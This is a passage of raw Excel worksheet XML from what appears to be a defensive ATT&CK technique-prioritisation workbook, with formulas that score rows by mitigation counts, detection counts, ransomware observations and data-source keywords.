        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L227">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M227" s="25">
        <v>0</v>
      </c>
      <c r="N227" s="51">
        <v>0</v>
      </c>
      <c r="O227" s="51">
        <v>0</v>
      </c>
      <c r="P227" s="51">
        <v>0</v>
      </c>
      <c r="Q227" s="51">
        <v>0</v>
      </c>
      <c r="R227" s="53" t="s">
        <v>951</v>
      </c>
      <c r="S227" s="51">
        <v>8</v>
      </c>
      <c r="T227" s="51" t="s">
        <v>419</v>
      </c>
      <c r="U227" s="51">
        <v>14</v>
      </c>
      <c r="V227" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.20952380952380956</v>
      </c>
      <c r="W227">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>22</v>
      </c>
      <c r="X227">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.4</v>
      </c>
      <c r="Y227">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.4</v>
      </c>
      <c r="Z227">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA227">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB227">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC227" s="29" t="s">
        <v>399</v>
      </c>
      <c r="AD227" s="25" t="str" cm="1">
        <f t="array" ref="AD227">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC227)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE227" s="25">
        <f>IF(AD227="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF227" s="25" t="str" cm="1">
        <f t="array" ref="AF227">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC227)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG227" s="25">
        <f>IF(AF227="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH227" s="25" t="str" cm="1">
        <f t="array" ref="AH227">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC227)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI227" s="25">
        <f>IF(AH227="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ227" s="25" t="str" cm="1">
        <f t="array" ref="AJ227">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC227)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK227" s="25">
        <f>IF(AJ227="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL227" s="25" t="str" cm="1">
        <f t="array" ref="AL227">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC227)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM227" s="25">
        <f>IF(AL227="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN227" s="61">
        <v>0</v>
      </c>
      <c r="AO227" s="51">
        <v>0</v>
      </c>
      <c r="AP227" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.1166666666666664E-2</v>
      </c>
      <c r="AQ227" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.13722222222222222</v>
      </c>
      <c r="AR227" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.13722222222222222</v>
      </c>
      <c r="AS227" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT227" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU22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28" spans="1:47" ht="32.1">
      <c r="A228" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.1166666666666664E-2</v>
      </c>
      <c r="B228" s="25">
        <f>SUM(H228,M228,V228)*(1+SUM(AE228,AG228,AI228,AK228,AM228))</f>
        <v>0.41166666666666668</v>
      </c>
      <c r="C228" s="25" t="s">
        <v>989</v>
      </c>
      <c r="D228" s="25" t="s">
        <v>396</v>
      </c>
      <c r="E228" s="25" t="s">
        <v>990</v>
      </c>
      <c r="F228" s="51">
        <v>1</v>
      </c>
      <c r="G228" s="51">
        <v>1</v>
      </c>
      <c r="H228" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I228">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J228">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K228">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L228">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M228" s="25">
        <v>0</v>
      </c>
      <c r="N228" s="51">
        <v>0</v>
      </c>
      <c r="O228" s="51">
        <v>0</v>
      </c>
      <c r="P228" s="51">
        <v>0</v>
      </c>
      <c r="Q228" s="51">
        <v>0</v>
      </c>
      <c r="R228" s="52" t="s">
        <v>397</v>
      </c>
      <c r="S228" s="51">
        <v>8</v>
      </c>
      <c r="T228" s="51" t="s">
        <v>398</v>
      </c>
      <c r="U228" s="51">
        <v>14</v>
      </c>
      <c r="V228" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.20952380952380956</v>
      </c>
      <c r="W228">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>22</v>
      </c>
      <c r="X228">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.4</v>
      </c>
      <c r="Y228">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.4</v>
      </c>
      <c r="Z228">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA228">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB228">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC228" s="29" t="s">
        <v>420</v>
      </c>
      <c r="AD228" s="25" t="str" cm="1">
        <f t="array" ref="AD228">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC228)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE228" s="25">
        <f>IF(AD228="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF228" s="25" t="str" cm="1">
        <f t="array" ref="AF228">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC228)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG228" s="25">
        <f>IF(AF228="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH228" s="25" t="str" cm="1">
        <f t="array" ref="AH228">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC228)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI228" s="25">
        <f>IF(AH228="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ228" s="25" t="str" cm="1">
        <f t="array" ref="AJ228">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC228)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK228" s="25">
        <f>IF(AJ228="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL228" s="25" t="str" cm="1">
        <f t="array" ref="AL228">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC228)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM228" s="25">
        <f>IF(AL228="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN228" s="60">
        <v>0</v>
      </c>
      <c r="AO228" s="51">
        <v>0</v>
      </c>
      <c r="AP228" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.1166666666666664E-2</v>
      </c>
      <c r="AQ228" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.13722222222222222</v>
      </c>
      <c r="AR228" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.13722222222222222</v>
      </c>
      <c r="AS228" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT228" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU22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29" spans="1:47" ht="32.1">
      <c r="A229" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.7080952380952381E-2</v>
      </c>
      <c r="B229" s="25">
        <f>SUM(H229,M229,V229)*(1+SUM(AE229,AG229,AI229,AK229,AM229))</f>
        <v>0.37080952380952381</v>
      </c>
      <c r="C229" s="25" t="s">
        <v>991</v>
      </c>
      <c r="D229" s="25" t="s">
        <v>129</v>
      </c>
      <c r="E229" s="25" t="s">
        <v>992</v>
      </c>
      <c r="F229" s="51">
        <v>1</v>
      </c>
      <c r="G229" s="51">
        <v>1</v>
      </c>
      <c r="H229" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I229">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J229">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K229">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L229">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M229" s="25">
        <v>0</v>
      </c>
      <c r="N229" s="51">
        <v>0</v>
      </c>
      <c r="O229" s="51">
        <v>0</v>
      </c>
      <c r="P229" s="51">
        <v>0</v>
      </c>
      <c r="Q229" s="51">
        <v>0</v>
      </c>
      <c r="R229" s="52" t="s">
        <v>911</v>
      </c>
      <c r="S229" s="51">
        <v>10</v>
      </c>
      <c r="T229" s="52" t="s">
        <v>912</v>
      </c>
      <c r="U229" s="51">
        <v>12</v>
      </c>
      <c r="V229" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.20952380952380956</v>
      </c>
      <c r="W229">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>22</v>
      </c>
      <c r="X229">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.4</v>
      </c>
      <c r="Y229">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.4</v>
      </c>
      <c r="Z229">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA229">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB229">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC229" s="29" t="s">
        <v>993</v>
      </c>
      <c r="AD229" s="25" t="str" cm="1">
        <f t="array" ref="AD229">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC229)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE229" s="25">
        <f>IF(AD229="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF229" s="25" t="str" cm="1">
        <f t="array" ref="AF229">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC229)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG229" s="25">
        <f>IF(AF229="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH229" s="25" t="str" cm="1">
        <f t="array" ref="AH229">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC229)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI229" s="25">
        <f>IF(AH229="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ229" s="25" t="str" cm="1">
        <f t="array" ref="AJ229">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC229)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK229" s="25">
        <f>IF(AJ229="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL229" s="25" t="str" cm="1">
        <f t="array" ref="AL229">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC229)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM229" s="25">
        <f>IF(AL229="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN229" s="52">
        <v>0</v>
      </c>
      <c r="AO229" s="51">
        <v>0</v>
      </c>
      <c r="AP229" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.7080952380952381E-2</v>
      </c>
      <c r="AQ229" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1236031746031746</v>
      </c>
      <c r="AR229" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1236031746031746</v>
      </c>
      <c r="AS229" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT229" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU22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30" spans="1:47" ht="48">
      <c r="A230" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.10783333333333334</v>
      </c>
      <c r="B230" s="25">
        <f>SUM(H230,M230,V230)*(1+SUM(AE230,AG230,AI230,AK230,AM230))</f>
        <v>0.41166666666666668</v>
      </c>
      <c r="C230" s="25" t="s">
        <v>994</v>
      </c>
      <c r="D230" s="25" t="s">
        <v>396</v>
      </c>
      <c r="E230" s="25" t="s">
        <v>995</v>
      </c>
      <c r="F230" s="51">
        <v>1</v>
      </c>
      <c r="G230" s="51">
        <v>1</v>
      </c>
      <c r="H230" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I230">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J230">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K230">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L230">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M230" s="25">
        <v>0</v>
      </c>
      <c r="N230" s="51">
        <v>0</v>
      </c>
      <c r="O230" s="51">
        <v>1</v>
      </c>
      <c r="P230" s="51">
        <v>0</v>
      </c>
      <c r="Q230" s="51">
        <v>1</v>
      </c>
      <c r="R230" s="52" t="s">
        <v>802</v>
      </c>
      <c r="S230" s="51">
        <v>7</v>
      </c>
      <c r="T230" s="51" t="s">
        <v>398</v>
      </c>
      <c r="U230" s="51">
        <v>14</v>
      </c>
      <c r="V230" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.20952380952380953</v>
      </c>
      <c r="W230">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>21</v>
      </c>
      <c r="X230">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Y230">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Z230">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA230">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB230">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC230" s="29" t="s">
        <v>996</v>
      </c>
      <c r="AD230" s="25" t="str" cm="1">
        <f t="array" ref="AD230">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC230)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE230" s="25">
        <f>IF(AD230="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF230" s="25" t="str" cm="1">
        <f t="array" ref="AF230">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC230)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG230" s="25">
        <f>IF(AF230="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH230" s="25" t="str" cm="1">
        <f t="array" ref="AH230">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC230)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI230" s="25">
        <f>IF(AH230="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ230" s="25" t="str" cm="1">
        <f t="array" ref="AJ230">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC230)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK230" s="25">
        <f>IF(AJ230="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL230" s="25" t="str" cm="1">
        <f t="array" ref="AL230">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC230)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM230" s="25">
        <f>IF(AL230="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN230" s="52">
        <v>2</v>
      </c>
      <c r="AO230" s="51">
        <v>1</v>
      </c>
      <c r="AP230" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.10783333333333334</v>
      </c>
      <c r="AQ230" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.13722222222222222</v>
      </c>
      <c r="AR230" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.13722222222222222</v>
      </c>
      <c r="AS230" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT230" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU23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31" spans="1:47">
      <c r="A231" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.0414285714285707E-2</v>
      </c>
      <c r="B231" s="25">
        <f>SUM(H231,M231,V231)*(1+SUM(AE231,AG231,AI231,AK231,AM231))</f>
        <v>0.37080952380952381</v>
      </c>
      <c r="C231" s="25" t="s">
        <v>997</v>
      </c>
      <c r="D231" s="25" t="s">
        <v>94</v>
      </c>
      <c r="E231" s="25" t="s">
        <v>998</v>
      </c>
      <c r="F231" s="51">
        <v>1</v>
      </c>
      <c r="G231" s="51">
        <v>1</v>
      </c>
      <c r="H231" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I231">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J231">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K231">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L231">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M231" s="25">
        <v>0</v>
      </c>
      <c r="N231" s="51">
        <v>0</v>
      </c>
      <c r="O231" s="51">
        <v>1</v>
      </c>
      <c r="P231" s="51">
        <v>1</v>
      </c>
      <c r="Q231" s="51">
        <v>6</v>
      </c>
      <c r="R231" s="52" t="s">
        <v>808</v>
      </c>
      <c r="S231" s="51">
        <v>7</v>
      </c>
      <c r="T231" s="52" t="s">
        <v>809</v>
      </c>
      <c r="U231" s="51">
        <v>11</v>
      </c>
      <c r="V231" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.20952380952380953</v>
      </c>
      <c r="W231">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>18</v>
      </c>
      <c r="X231">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Y231">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.32727272727272727</v>
      </c>
      <c r="Z231">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>8</v>
      </c>
      <c r="AA231">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.08</v>
      </c>
      <c r="AB231">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.08</v>
      </c>
